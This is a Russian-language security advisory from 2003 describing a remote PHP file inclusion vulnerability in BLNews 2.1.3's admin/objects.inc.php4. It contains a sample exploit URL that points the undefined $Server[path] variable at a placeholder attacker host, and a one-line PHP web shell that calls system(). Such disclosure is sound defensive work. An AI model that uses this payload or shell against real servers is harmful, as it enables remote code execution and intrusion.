Security Lab

Уязвимость в 'objects.inc.php4' позволяет удаленному атакующему выполнить произвольный код на BLNews сервере

Дата публикации:29.05.2003
Всего просмотров:969
Опасность:
Наличие исправления:
Количество уязвимостей:1
CVE ID: Нет данных
Вектор эксплуатации:
Воздействие:
CWE ID: Нет данных
Наличие эксплоита: Нет данных
Уязвимые продукты:
Описание: Уязвимость включения файлов обнаружена в BLNews. Удаленный пользователь может выполнить произвольный PHP код, включая команды операционной системы, на целевом сервере.

DWC Gr0up сообщает, что сценарий 'admin/objects.inc.php4' использует переменную $Server[path], но не определяет эту переменную. Удаленный пользователь может представить значение для этой переменной, ссылающееся на сценарий, расположенный на удаленном сервере, который будет выполнен на целевом сервере. Пример:

admin/objects.inc.php4?Server[path]=http://ATACKER&Server[language_file]=cmd.php4
with
http://ATACKER/admin/tools.inc.php4
http://ATACKER/admin/cmd.php4

with
<? system($cmd) ?>
Уязвимость обнаружена в BLNews 2.1.3
Ссылки: PHP source code injection in BLNews